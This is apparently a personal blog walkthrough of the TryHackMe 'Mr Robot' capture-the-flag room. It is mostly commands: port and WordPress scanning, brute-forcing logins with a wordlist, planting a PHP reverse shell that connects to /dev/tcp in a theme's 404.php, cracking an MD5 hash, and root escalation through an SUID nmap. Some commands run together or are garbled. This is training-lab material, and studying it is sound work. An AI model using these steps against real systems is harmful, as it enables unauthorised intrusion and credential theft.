Jun 17, 2020
TryHackMe: Mr Robot CTF
- Port scan
nmap -Pn <ip>
2. All scan
nmap -A -p 22,80,443 <ip>
3. Vulnerability scan
nmap --script vuln -p 22,80,443 <ip>
This is a wordpress site. There’s a robots.txt file
4. Access HTTP site
There’re commands that I can try.
prepare
fsociety
inform
question
wakeup
join
Seems like these commands are just for fun.
Viewing source of index page is not useful.
Inspecting element is not useful neither.
5. Access robots.txt
Download fsocity.dic
wget http://<ip>/fsocity.diccat fsocity.dic
This file may contain useful password.
Count lines of the file
wc -l fsocity.dic
Sort the file and remove duplication
sort fsocity.dic | uniq > sort_fsocity.dicwc -l sort_fsocity.dic
Access http://<ip>/key-1-of-3.txt
6. Nikto scan
nikto -h http://<ip>/ -nossl
7.Directory scan
dirb http://<ip>
Seems like it’s a wordpress site. Access one of scanned directories.
http://<ip>/0/
View source, nothing useful.
8. Wordpress scan
wpscan --url http://<ip>/0/ -et -ep -euFailed
Add another flag as suggestion
wpscan --url http://<ip>/0/ --wp-content-dir -et -ep -euThere’re 2 users: mich05654 and elliot.
9. Bruteforcing wordpress
wpscan --url http://<ip>/0/ --wp-content-dir -eu -P fsocity.dic
Access http://<ip>/wp-login.php
Username -> mich05654:Dylan_2791
Can’t do anything with this user.
Let’s try elliot:ER28–0652
On Dashboard -> Users. Elliot is an administrator.
Let’s get the reverse shell
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/<ip>/1234 0>&1'");
?>Go to appearance -> editor -> Put the code in 404.php
Create listener
nc -lvp 1234
Access 404.php
Now I have a shell.
cd /home/lscat key-2-of-3.txt
I don’t have permission to key2.
Read another file. It’s robot’s credential.
cat password.raw-md5
Crack with hashcat
hashcat -m 0 c3fcd3d76192e4007dfb496cca67e13b ~/Desktop/rockyou.txthashcat -m 0 c3fcd3d76192e4007dfb496cca67e13b ~/Desktop/rockyou.txt --show
Change to robot
su robotFailed. I need TTY shell
Import TTY shell
python -c 'import pty;pty.spawn("/bin/bash");'
Change to robot
su robot
Read key2
cat key-2-of-3.txt
Let’s do privilege escalation
Check if robot can run sudo.
sudo -lI can’t run sudo.
Looking for SUID
find / -perm -u=s -type f 2>/dev/nullIt’ nmap!!!
nmap --interactive!shid
Now I’m root.
cd /rootcat key-3-of-3.txt
